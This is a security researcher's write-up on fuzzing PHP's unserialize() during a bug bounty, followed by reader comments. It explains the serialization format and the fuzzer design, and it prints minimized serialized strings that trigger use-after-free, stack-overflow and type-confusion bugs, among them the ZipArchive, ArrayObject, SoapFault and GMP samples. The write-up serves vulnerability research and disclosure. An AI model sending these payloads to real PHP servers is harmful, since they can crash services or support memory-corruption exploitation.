While auditing Pornhub we stumbled across several pages where user input was passed to unserialize and the result was reflected back to the page. After enumerating class names from known frameworks and testing for old vulnerabilities in unserialize itself, we realized that exploiting this issue could be much harder than initially assumed.
The first thought was: OK, why not just find a new 0day in unserialize? This function has a very bad history and many bugs have been discovered over the past years. It can’t be /that/ hard, challenge accepted! I spent some time on reading code and checking fixes for old bugs, but I couldn’t find anything interesting. Most of the bugs from the last years were type confusions and use-after-free vulnerabilities. In most cases the bugs were so simple that twiddling some values in a legit serialized string could lead to pwnage. So, why not just write a fuzzer that crafts syntactically correct strings and passes them to unserialize?
At that point the motivation was not only to get a bounty from Pornhub but also to find a new PHP bug since there could be no way that unserialize is secure. In the end, this project was very helpful to earn some money: How we broke PHP, hacked Pornhub and earned $20,000
Unserializing data from user input in PHP is dangerous for the following reasons:
- As we all know, methods of unserialized classes can be invoked (ROP in PHP applications).
- It is possible to set references at almost arbitrary locations (often leads to use-after-free vulnerabilities).
- Types of variables can be defined in the serialized string (can lead to type confusion if internal classes make wrong assumptions about property types).
Unserialize Syntax
Before a fuzzer can be implemented, the syntax of PHP’s serialize format must be understood. There are 12 different symbols, each of them for one data type and use case. The following code shows the switch table that can be found in the source code of PHP:
```c
/* ext/standard/var_unserializer.c */
/* [...] */
switch (yych) {
case 'C':
case 'O': goto yy13;
case 'N': goto yy5;
case 'R': goto yy2;
case 'S': goto yy10;
case 'a': goto yy11;
case 'b': goto yy6;
case 'd': goto yy8;
case 'i': goto yy7;
case 'o': goto yy12;
case 'r': goto yy4;
case 's': goto yy9;
case '}': goto yy14;
default: goto yy16;
}
/* [...] */
```
Accordingly, the following table shows all symbols and their meanings. To follow it, it helps to understand how PHP’s variables work; see PHP Internals Book – Basic zval structure.
Symbol | Data Type | Description | Example |
---|---|---|---|
N | null | A NULL value | N; |
b | bool | The value can either be true(1) or false(0) | b:1; |
i | int | Numeric value | i:1337; |
d | double | Double value. Value can be provided as a normal floating value or as E value (e.g. 1.234E+20). There are three special values: INF, -INF, NAN | d:1.337; d:1.3333333E+20 |
s | string | A serialized string contains the string length and the actual string surrounded by double quotes | s:4:"meow"; |
S | encoded string | The encoded string is very similar to the normal string. The difference is that characters can be hex encoded: A = \41 . This type makes it possible to keep the serialized string printable and is very useful in case the server rejects certain characters | S:5:"me\00ow"; |
a | array | The array size is defined first. The actual content remains between the {} and must be provided as key value pairs. | a:1:{i:0;s:5:"value";} |
O | Object | Objects have the class name at the beginning followed by the property definitions. Similar to arrays, key-value pairs are required here. Properties can be public, private or protected. A public property only requires the actual property name. For private and protected properties some extra information must be prefixed. A property named test is encoded as follows for the different visibilities: public: test; private: \x00Classname\x00test; protected: \x00*\x00test | O:8:"stdClass":1:{s:4:"test";i:123;} |
C | Custom Object | Several classes use a custom unserializer and require to use the C symbol. Similar to a normal object the class name is defined first and is followed by the custom serialized string. Contrary to a normal object the number before the custom content defines the length of the custom content instead of the number of properties. | C:11:"ArrayObject":21:{x:i:0;a:0:{};m:a:0:{}} |
r | reference | A reference to an existing value in the serialized string. | r:1; |
R | reference | A reference to an existing value in the serialized string. The is_reference attribute of the zval is set | R:1; |
o | wtf object | The purpose of the lowercase o is unclear. It represents an object but it is not possible to set the class name (defaults to stdClass). The misplaced " in the sample is not a typo. | o:1:"s:4:"prop";i:1;} |
Each unserialized value has an index that r and R can refer to. The first element (the outer array or object) has index 1. References using the uppercase R and keys of any kind (array keys and property names) do not increase the index. Keys and property names can be of type i, s and S. PHP’s unserializer is very strict about the syntax: if a single character is invalid, the function aborts parsing and nothing is returned. To keep the fuzzer efficient, I had to make sure that it did not generate invalid test samples.
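To make the table and the indexing rules concrete, here is a small sketch that uses only PHP's own serialize() and unserialize(). The class name Demo and its properties are made up for illustration, and the behavior described in the comments assumes a stock PHP 7 or later.

```php
<?php
// Illustrative class; its name and properties are assumptions for this example.
class Demo {
    public $pub = 1;
    protected $pro = 2;
    private $pri = 3;
}

// Arrays and scalars map directly to the symbols in the table.
echo serialize([0 => "value"]), "\n";   // a:1:{i:0;s:5:"value";}

// Non-public property names carry NUL-delimited prefixes.
$s = serialize(new Demo());
echo str_replace("\0", '\x00', $s), "\n";

// Index 1 is the outer array, index 2 is its first value.
// R:2 turns element 1 into a PHP reference to element 0 ...
$ref = unserialize('a:2:{i:0;s:4:"meow";i:1;R:2;}');
$ref[1] = "purr";
var_dump($ref[0]);   // element 0 changed as well

// ... while r:2 only copies the value.
$copy = unserialize('a:2:{i:0;s:4:"meow";i:1;r:2;}');
$copy[1] = "purr";
var_dump($copy[0]);  // element 0 is unchanged
```

Note that the keys i:0 and i:1 are skipped when counting: the string "meow" is value number 2 even though it is the third token in the payload.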
Fuzzing Unserialize
A good fuzzer should be able to generate any syntactically correct payload. I decided to ignore parser bugs and focused on finding incorrect handling of variables and references. Unfortunately, PHP’s serialize() is not capable of generating arbitrary outputs. For example it is not possible to define the same array key twice in the serialized string. Also one cannot place arbitrary references at arbitrary locations. That’s why I implemented a custom serializer that let me construct whatever I wanted.
```php
$o = new O("stdClass");
$o->set("prop", new I(1335));

$array = new A();
$array->set(123, new S("meow"));
$array->set(123, new PRef($array));
$array->set(1, $o);

echo $array;

/* Result:
a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:1335;}}
*/
```
From here I only needed to obtain a list of internal classes and their properties from PHP’s source code. Now I was able to generate random samples and pass them to unserialize in order to (hopefully) trigger unexpected behavior.
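The fuzzer itself is not published, so the following is only a guess at how such a custom serializer could be structured. All class names (IntNode, StrNode, RefNode, ArrayNode, ObjectNode) are hypothetical, and unlike the PRef helper above, references here take an explicit index instead of resolving it from a target node.

```php
<?php
// Hypothetical node classes for hand-building serialized strings.
// None of these names come from the author's fuzzer.
abstract class Node {
    abstract public function __toString(): string;
}

final class IntNode extends Node {
    private $value;
    public function __construct(int $value) { $this->value = $value; }
    public function __toString(): string { return "i:{$this->value};"; }
}

final class StrNode extends Node {
    private $value;
    public function __construct(string $value) { $this->value = $value; }
    public function __toString(): string {
        return 's:' . strlen($this->value) . ':"' . $this->value . '";';
    }
}

final class RefNode extends Node {
    private $index;
    private $symbol;
    // $index is the 1-based value index; 'R' sets is_reference, 'r' does not.
    public function __construct(int $index, string $symbol = 'R') {
        $this->index = $index;
        $this->symbol = $symbol;
    }
    public function __toString(): string { return "{$this->symbol}:{$this->index};"; }
}

// Shared by arrays and objects: an ordered list of key/value pairs.
// Duplicate keys are kept, which serialize() would never emit.
abstract class PairNode extends Node {
    protected $pairs = [];
    public function set(Node $key, Node $value): self {
        $this->pairs[] = [$key, $value];
        return $this;
    }
    protected function body(): string {
        $out = '';
        foreach ($this->pairs as [$key, $value]) {
            $out .= $key . $value;
        }
        return count($this->pairs) . ':{' . $out . '}';
    }
}

final class ArrayNode extends PairNode {
    public function __toString(): string { return 'a:' . $this->body(); }
}

final class ObjectNode extends PairNode {
    private $class;
    public function __construct(string $class) { $this->class = $class; }
    public function __toString(): string {
        return 'O:' . strlen($this->class) . ':"' . $this->class . '":' . $this->body();
    }
}

// Rebuild the sample from the article: a duplicate key plus a reference.
$object = (new ObjectNode('stdClass'))->set(new StrNode('prop'), new IntNode(1335));
$array = (new ArrayNode())
    ->set(new IntNode(123), new StrNode('meow'))
    ->set(new IntNode(123), new RefNode(1))
    ->set(new IntNode(1), $object);

echo $array, "\n";
```

Because every node only knows how to print itself, a random generator can combine them freely and the output stays syntactically valid by construction.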
Unexpected Behavior
You could argue that a memory corruption in PHP’s unserialize is in fact expected behavior because everyone knows the history of that function. However, the following events indicate that something went wrong during the unserialization process.
- Segmentation fault:
  The most obvious event is a segmentation fault which can easily be detected by checking the return code of the process.
- PHP prints zend_mm_heap_corrupted:
  PHP uses its own memory manager for allocations. In case the allocator detects a corruption on the heap a corresponding message is printed.
- &UNKNOWN;:
  The type of a value is stored inside the zval structure and can be a number between 0 and 10. For example the type 1 indicates an integer and type 6 is used for strings. When a variable that is printed with var_dump has an unknown type (not in the range 0-10) the string “&UNKNOWN;” is printed instead. This indicates a memory corruption since it is normally not possible to craft a data type which is unknown to PHP.
- Crafted integer zval:
  In PHP 5.6 zval structs have a size of 24 bytes. If this struct is entirely filled with \x01 the resulting value is an integer with the value 72340172838076673. I let the fuzzer place 24 byte long strings consisting of \x01 in the test cases. The presence of 72340172838076673 in the resulting deserialized data indicates that a use-after-free vulnerability has been found and successfully been exploited.
- Incorrect return value:
  The fuzzer always used an array as outer element leading to two possible return data types of unserialize: “array” when no errors occurred, or “NULL” in case the input was not satisfying for unserialize. Every data type different from array or null means that something unexpected has happened.
- Post-unserialize allocation:
  The occurrence of variables that are defined between unserializing and var_dump is most likely a sign of a use-after-free vulnerability.
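The indicators above could be checked mechanically along the following lines. This is a rough sketch and not the author's harness: the function name classify_run, its parameters and the finding labels are all hypothetical. It assumes a 64-bit PHP, an exit code that follows the shell convention of 128 plus the signal number, and simple substring matching that may produce false positives.

```php
<?php
// Eight 0x01 bytes read as a 64-bit integer (requires 64-bit PHP).
const CANARY_INT = 0x0101010101010101;

/**
 * Hypothetical classifier: maps one finished test run to a list of findings.
 *
 * $exitCode   exit status of the PHP process (assumed 128 + signal on a crash)
 * $output     everything the process printed
 * $returnType type the harness observed for the result, e.g. "array" or "NULL"
 * $fillers    strings the test case assigned after calling unserialize()
 */
function classify_run(int $exitCode, string $output, string $returnType, array $fillers = []): array {
    $findings = [];
    if ($exitCode === 128 + 11) {                       // SIGSEGV
        $findings[] = 'segfault';
    }
    if (strpos($output, 'zend_mm_heap') !== false) {    // allocator complaint
        $findings[] = 'heap_corruption';
    }
    if (strpos($output, 'UNKNOWN') !== false) {         // var_dump saw an invalid type
        $findings[] = 'unknown_type';
    }
    if (strpos($output, 'int(' . CANARY_INT . ')') !== false) {
        $findings[] = 'crafted_integer';
    }
    if (!in_array($returnType, ['array', 'NULL'], true)) {
        $findings[] = 'unexpected_return_type';
    }
    foreach ($fillers as $filler) {
        if (strpos($output, '"' . $filler . '"') !== false) {
            $findings[] = 'post_unserialize_allocation';
            break;
        }
    }
    return $findings;
}

print_r(classify_run(139, '', 'NULL'));
print_r(classify_run(0, 'string(4) "bbbb"', 'string', ['aaaa', 'bbbb']));
```

The filler check only makes sense if the fuzzer never emits those filler strings itself; otherwise a legitimate payload value would be reported as a finding.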
Test Cases
With the different behaviors that could occur in mind I designed the following test cases which were executed one after another with the same payload.
- Unserialize only:
  This test case does nothing but unserialize the provided serialized string.
- Unserialize var_dump:
  Here, the string is unserialized and every value in the result is accessed and printed via var_dump.
- Unserialize unserialize var_dump:
  A second unserialize has been added. Its purpose is to increase the amount of memory operations after the initial unserialize.
- Unserialize alloc var_dump:
  Here, the string is unserialized, some fixed values are assigned to variables and finally the result of unserialize is printed.
All test cases are required because bugs can occur in different stages (e.g. unserialize, printing or shutdown of the PHP engine). By looking at the results of the different test cases it is also possible to determine where the bug has happened (if any was found).
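One way to picture the four test cases is as small PHP scripts generated from the same payload. The helper below is a hypothetical sketch (build_test_cases and the array keys are invented names); the filler values mirror the ones used in the proof-of-concept code later in this article.

```php
<?php
/**
 * Hypothetical helper: wraps one payload in the four test-case scripts.
 * Each returned string is PHP source meant to run in its own process.
 */
function build_test_cases(string $payload): array {
    // var_export() yields a valid PHP string literal, so no manual escaping is needed.
    $call = 'unserialize(' . var_export($payload, true) . ');';
    $dump = ' var_dump($r);';

    return [
        'unserialize'            => '$r = ' . $call,
        'unserialize_dump'       => '$r = ' . $call . $dump,
        'unserialize_twice_dump' => '$r = ' . $call . ' $r2 = ' . $call . $dump,
        'unserialize_alloc_dump' => '$r = ' . $call . ' $a = "aaaa"; $b = "bbbb";' . $dump,
    ];
}

foreach (build_test_cases('a:1:{i:0;i:1;}') as $name => $source) {
    echo $name, ': ', $source, "\n";
}
```

Each generated string could then be run in a fresh process, for example with php -r, so that a crash in one stage does not take the harness down and the failing stage can be read off the test-case name.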
Calibration and Tests
Before running the fuzzer I looked at PoCs of some old unserialize bugs to make sure I didn’t miss something. Turned out the fuzzer covered almost everything from the past. A first test against an old PHP version produced more segfaults than the kernel could handle. A second test against a recent PHP 7 version also spit out results very quickly. Unfortunately, it was a very unreliable bug that has not been investigated further – yet. The first tests against PHP 5.6.21 only resulted in some lame DoS bugs which are described at the bottom of this article.
Findings
The very first version of the fuzzer logged the serialized strings and var_dump outputs of all test cases and ended up filling my hard drive very quickly. It took some time and adjustments to the fuzzer until unexpected behavior was detected. Finally, after setting a decent fuzzing depth and generating large samples that were about 1-2M in size I found unexpected behavior. The interesting thing here was that it didn’t happen reliably and depended on how many objects were allocated before or while unserializing the string. Together with evonide we figured out that the required number of objects was around 10000. After excluding irrelevant classes one by one I finally managed to get a working test case that was only ~1000 bytes in size. After some more work I finally crafted the smallest possible test case.
```php
$serialized_string = 'a:1:{i:0;a:3:{i:1;N;i:2;O:10:"ZipArchive":1:{s:8:"filename";i:1337;}i:1;R:5;}}';
$array = unserialize($serialized_string);
gc_collect_cycles();
$filler1 = "aaaa";
$filler2 = "bbbb";
var_dump($array[0]);

/* Result:
array(2) {
  [1]=>
  string(4) "bbbb"
  [2]=>
  object(ZipArchive)#1 (5) {
    ["status"]=>
    int(0)
    ["statusSys"]=>
    int(0)
    ["numFiles"]=>
    int(0)
    ["filename"]=>
    string(0) ""
    ["comment"]=>
    string(0) ""
  }
}
*/
```
Unfortunately, it is not guaranteed that ZipArchive exists on a target system since some distributions make it optional. So I continued fuzzing and included the number of objects/arrays in the sample that were required to trigger the first bug. I found another bug almost instantaneously. Similar to the first test case I had to minimize a 500kb sample before going on.
```php
$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:6;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';
$array = unserialize($serialized_string);
gc_collect_cycles();
$filler1 = "aaaa";
$filler2 = "bbbb";
var_dump($array);

/* Result:
string(4) "bbbb"
*/
```
This bug seemed to be promising. Unfortunately, it turned out that it was not suitable for remote exploitation in this form. A lot of follow-up research and adjustments had to be done. For more information you can read evonide’s write-up Breaking PHP’s Garbage Collection and Unserialize.
Bonus Round
Unserialize is still riddled with bugs. Here are a few strings that lead to, let’s say, “problems”.
```
// php 5.x, 7.x
O:9:"SoapFault":1:{s:11:"faultstring";r:1;}
// php 7.x (5.x with var_dump)
C:3:"GMP":23:{s:1:"2";a:1:{i:46;R:1;}}
// php 5.x, 7.x
O:9:"Exception":1:{S:19:"\00Exception\00previous";r:1;}
// php 7.x
a:1:{i:0;O:9:"Exception":2:{S:7:"\00*\00file";s:5:"aaaaa";S:17:"\00Exception\00string";O:8:"stdClass":1:{S:1:"a";O:12:"DateInterval":1:{s:14:"special_amount";R:2;}}}}
```
The first two payloads lead to stack overflows and cause segmentation faults, the third payload consumes “some” CPU resources and the last one is a mid-unserialize type confusion.
Another bug can be triggered by using a custom class with a __wakeup method. __wakeup gets invoked every time an object of this class is unserialized. In this example, the property kiri is a reference to the outer array, which gets destroyed when $this->kiri is assigned.
```php
class hara {
    function __wakeup() {
        $this->kiri = 123;
    }
}
$bad = 'a:2:{i:0;O:4:"hara":1:{s:4:"kiri";R:1;}i:0;i:1;}';
$f = unserialize($bad);
var_dump($f);
```
- The string is passed to unserialize.
- As soon as the closing } for the object is found the wakeup method of the object is called.
- The wakeup method destroys the outer array.
- The unserializer tries to add the object to the array. Unfortunately, this array has already been destroyed.
- The application crashes.
When a value is assigned to a property the internal function zend_std_write_property is eventually reached. Here, the zval of the old data is copied into a temporary zval. This temporary zval is passed to zval_dtor where the actual contents are destroyed. In our example the zval represents the outer array and contains a pointer to a HashTable. zval_dtor does not do any refcount checks and frees the HashTable without mercy. Unfortunately, unserialize still operates on this HashTable and will crash as soon as the wakeup function returns.
```c
/* Zend/zend_object_handlers.c */
/* [...] */
ZEND_API void zend_std_write_property(zval *object, zval *member, zval *value, const zend_literal *key TSRMLS_DC) /* {{{ */
{
    /* [...] */
    if (PZVAL_IS_REF(*variable_ptr)) {
        zval garbage = **variable_ptr; /* old value should be destroyed */

        /* To check: can't *variable_ptr be some system variable like error_zval here? */
        Z_TYPE_PP(variable_ptr) = Z_TYPE_P(value);
        (*variable_ptr)->value = value->value;
        if (Z_REFCOUNT_P(value) > 0) {
            zval_copy_ctor(*variable_ptr);
        } else {
            efree(value);
        }
        zval_dtor(&garbage);
    }
    /* [...] */
}
```
This bug is a classic use-after-free vulnerability, but sadly only a HashTable is freed rather than a zval. Nevertheless, it is still an exploitable bug that has existed since early PHP 4 versions. However, it is difficult to exploit because I found no way to leak arbitrary memory with it. As such, it is difficult to craft the fake HashTables that would be needed for further exploitation.
Closing Words
PHP’s unserializer has been insecure for as long as it has existed and probably will be until it dies. The use of unserialize on user input should be considered critical in every pentest report, even when the PHP version is up to date.
Always keep in mind that deserialization of user input is a bad idea in every language if not done right. In Python (pickle) and Java (readObject) things are even worse because the deserializers allow code execution using only language defaults. You should rely on less complex serialization formats like JSON.
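As a minimal sketch of that advice, untrusted input can be decoded with json_decode instead of unserialize. The function name decode_untrusted is invented for this example, and a real application would still need to validate the decoded fields against what it expects.

```php
<?php
/**
 * Decodes untrusted input as JSON and accepts only arrays.
 * Returns null for anything else, including PHP serialized strings.
 */
function decode_untrusted(string $raw): ?array {
    $data = json_decode($raw, true);   // true: JSON objects become associative arrays
    if (json_last_error() !== JSON_ERROR_NONE || !is_array($data)) {
        return null;
    }
    return $data;
}

var_dump(decode_untrusted('{"user":"alice","id":7}'));
var_dump(decode_untrusted('O:8:"stdClass":0:{}'));   // not valid JSON
```

JSON can only describe scalars, lists and maps, so the decoder never instantiates classes, invokes magic methods or creates references, which removes the three attack surfaces listed at the top of this article.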
The outcome of this project is very interesting as we expected to find vulnerabilities in unserialize itself but ended up finding 2 bugs in a totally different core component. It also shows that a highly specialized fuzzer can be very powerful.
At the moment I have no intention to release this fuzzer. Nevertheless, if you have questions you can leave me a comment or contact me via Twitter @haxonaut for further discussion.
Did you try to use any runtime memory checker? Does it make sense?
Memory checking can be used to spot some memory errors but I didn’t try it because one must accept a trade-off here:
While an extensive check could find errors it affects the samples/second rate drastically.
A solution that doesn’t check the whole memory doesn’t eat up that much time but could miss some issues.
Hi Dario,
Thank you for sharing this. The article shows a very good and clear workflow.
> A good fuzzer should be able to generate any syntactically correct payload.
Good point.
From my experience (I may actually be wrong), most people look for crashes while fuzzing. But you had a list of suspicious cases which should be investigated (“Unexpected Behavior” section). Did you make this list before the actual fuzzing? Or did you run the fuzzer first, and then derive those types of issues?
Hi,
before I wrote the fuzzer I already knew a lot about PHP and its internals and was able to create that list before starting to fuzz.
There are probably even more scenarios the list doesn’t cover because they are harder to predict. Especially when you hit a UAF vulnerability a lot of different things can happen.